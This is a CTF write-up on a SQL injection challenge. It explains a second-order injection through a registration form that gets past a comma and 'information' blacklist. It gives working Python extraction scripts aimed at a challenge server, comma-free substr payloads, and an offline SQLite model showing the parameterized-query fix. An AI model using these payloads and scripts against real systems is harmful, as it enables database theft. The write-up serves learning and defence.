Challenge analysis
The challenge description is just: SQL
Main functionality of the challenge interface:
There are three pages: registration, login, and a page shown after a successful login.
The description tells us to expect a SQL injection vulnerability.
Scanning shows that the registration page is injectable.
First attempt, a time-based blind payload in the username field:
{'username': "1' and ELT(left((SELECT schema_name FROM information_schema.schemata limit 0,1),1)='d',SLEEP(5)) or '1'='1", 'password': 'admin', 'email': 'eamil@eamil.com'}
The response showed that the input is being filtered.
Testing shows that commas and the keyword information are filtered.
That rules out the usual blind-injection route (no limit 0,1 and no information_schema), but whatever we put in the username field is still evaluated by the database. So instead of asking yes/no questions, we make the stored username itself carry the answer: the expression injected at registration is evaluated by the INSERT, its result is saved as the username, and the post-login page displays it. This works like a second-order injection: the payload goes in on one page and the data comes out on another.
Solution
From the registration form we can infer a statement of roughly this shape (the table name and column order are a guess; what matters is that username sits between two single quotes):
insert into tables values('$email','$username','$password')
By controlling the POST parameters we turn it into:
insert into tables values('admin1@admin.com','0'+ascii(substr((select database()) from 1 for 1))+'0','admin')
So the username actually inserted is the value of the expression we want to read. Two details make this survive the filter: substr(x FROM n FOR 1) is the comma-free spelling of substr(x, n, 1), and in MySQL '0' + n + '0' is numeric addition, so the username column ends up holding the ASCII code of the selected character (ascii('') is 0, which is how we detect the end of the string). Logging in with that throw-away account then displays the number.
Script to extract the database name:
import requests
from bs4 import BeautifulSoup  # HTML parser


def getDatabase():
    database = ''
    for i in range(10):
        # The stored username becomes the ASCII code of the (i+1)-th character of database()
        data_database = {
            'username': "0'+ascii(substr((select database()) from " + str(i + 1) + " for 1))+'0",
            'password': 'admin',
            "email": "admin11@admin.com" + str(i)  # one fresh account per position
        }
        # register
        requests.post("http://159.138.137.79:52974/register.php", data_database)
        login_data = {
            'password': 'admin',
            "email": "admin11@admin.com" + str(i)
        }
        response = requests.post("http://159.138.137.79:52974/login.php", login_data)
        html = response.text  # returned page
        soup = BeautifulSoup(html, 'html.parser')
        getUsername = soup.find_all('span')[0]  # the displayed username
        username = getUsername.text
        if int(username) == 0:  # ascii('') == 0: past the end of the string
            break
        database += chr(int(username))
    return database


print(getDatabase())
The database name comes back as web.
Retrieving the table names the same way failed, because information is filtered and information_schema cannot be queried.
I saw in the comments that the table name is just guessed, haha.
Still, here is the script that gets the flag.
Getting the table name failed partway through the script, so I commented it out, emmm.
import requests
from bs4 import BeautifulSoup  # HTML parser

BASE = "http://159.138.137.79:52974"


def leak(expr, email_prefix, length):
    """Read `expr` one character per throw-away account: the injected username
    stores the ASCII code of the i-th character, and login.php echoes it back."""
    result = ''
    for i in range(length):
        email = email_prefix + str(i)  # one fresh account per position
        payload = "0'+ascii(substr((" + expr + ") from " + str(i + 1) + " for 1))+'0"
        # register
        requests.post(BASE + "/register.php",
                      {'username': payload, 'password': 'admin', 'email': email})
        # log in and read the displayed username
        response = requests.post(BASE + "/login.php",
                                 {'password': 'admin', 'email': email})
        soup = BeautifulSoup(response.text, 'html.parser')
        username = soup.find_all('span')[0].text  # the displayed username
        if int(username) == 0:  # ascii('') == 0: past the end of the string
            break
        result += chr(int(username))
    return result


def getDatabase():
    return leak("select database()", "admin11@admin.com", 10)


def getTables():
    # Failed: tables() is not a MySQL function, and information_schema is filtered.
    return leak("select tables()", "admin12@admin.com", 10)


def getFlag():
    # Table name guessed (see above): flag
    return leak("select * from flag", "admin32@admin.com", 40)


print(getDatabase())
'''
print(getTables())
'''
print(getFlag())
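The mechanism used above, modelled offline as an added example (this is not the challenge's or this write-up's own code). SQLite stands in for the challenge's MySQL backend, and the users/flag tables, the flag value, and the App, extract, blocked and payload helper names are constructed for the demo. SQLite lacks MySQL's comma-free substr(x FROM n FOR 1) form, so the offline run uses unicode(substr(x,n,1)) and demonstrates the injection into the INSERT, the extraction loop, and the parameterized fix; the comma/information blacklist is only checked statically against the write-up's MySQL payloads.

```python
import sqlite3

# Tokens the write-up reports as filtered by the challenge.
BLACKLIST = (",", "information")


def blocked(value):
    """True if the challenge's blacklist (as described above) would reject `value`."""
    lowered = value.lower()
    return any(token in lowered for token in BLACKLIST)


def mysql_payload(expr, pos):
    """Comma-free MySQL username from the write-up. The stored username becomes
    the ASCII code of character `pos` of `expr`: MySQL treats '0' + n + '0'
    as numeric addition, and substr(x FROM n FOR 1) needs no comma."""
    return "0'+ascii(substr((" + expr + ") from " + str(pos) + " for 1))+'0"


def sqlite_payload(expr, pos):
    """Same trick for SQLite (used only by the offline model below). SQLite has
    no FROM/FOR form of substr, so this variant does contain a comma."""
    return "0'+unicode(substr((" + expr + ")," + str(pos) + ",1))+'0"


class App:
    """Stand-in for register.php / login.php with an in-memory SQLite database.
    Table, column and flag names are constructed for the demo."""

    def __init__(self):
        self.db = sqlite3.connect(":memory:")
        self.db.execute("create table users(email text, username text, password text)")
        self.db.execute("create table flag(flag text)")
        self.db.execute("insert into flag values('flag{constructed_demo}')")

    def register(self, email, username, password):
        # Vulnerable form, as inferred in the write-up: values are interpolated,
        # so an expression in `username` is evaluated by the INSERT.
        self.db.execute(
            "insert into users values('%s','%s','%s')" % (email, username, password)
        )

    def register_safe(self, email, username, password):
        # Hardened form: bound parameters; the payload is stored as an inert string.
        self.db.execute("insert into users values(?,?,?)", (email, username, password))

    def login(self, email, password):
        """Return the username the post-login page would display, or None."""
        row = self.db.execute(
            "select username from users where email=? and password=?",
            (email, password),
        ).fetchone()
        return row[0] if row else None


def extract(app, expr, max_len=64, tag="leak"):
    """Leak `expr` one character per registration, reading each back via login."""
    out = ""
    for pos in range(1, max_len + 1):
        email = "%s%d@example.com" % (tag, pos)  # fresh account per position
        app.register(email, sqlite_payload(expr, pos), "pw")
        shown = app.login(email, "pw")
        # Past the end of the string: MySQL's ascii('') is 0, SQLite's unicode('') is NULL.
        if shown is None or int(shown) == 0:
            break
        out += chr(int(shown))
    return out


def demo():
    """Return (leaked flag, whether the parameterized INSERT stored the payload verbatim)."""
    app = App()
    leaked = extract(app, "select flag from flag")
    payload = sqlite_payload("select flag from flag", 1)
    app.register_safe("safe@example.com", payload, "pw")
    return leaked, app.login("safe@example.com", "pw") == payload


if __name__ == "__main__":
    leaked, fixed = demo()
    print("leaked via vulnerable INSERT:", leaked)
    print("parameterized INSERT stored payload verbatim:", fixed)
```

Running it prints the constructed flag recovered through the vulnerable register/login pair, and True for the parameterized path: with bound parameters the same payload is stored as a literal string, so the post-login page would show the payload text instead of a number and nothing is leaked.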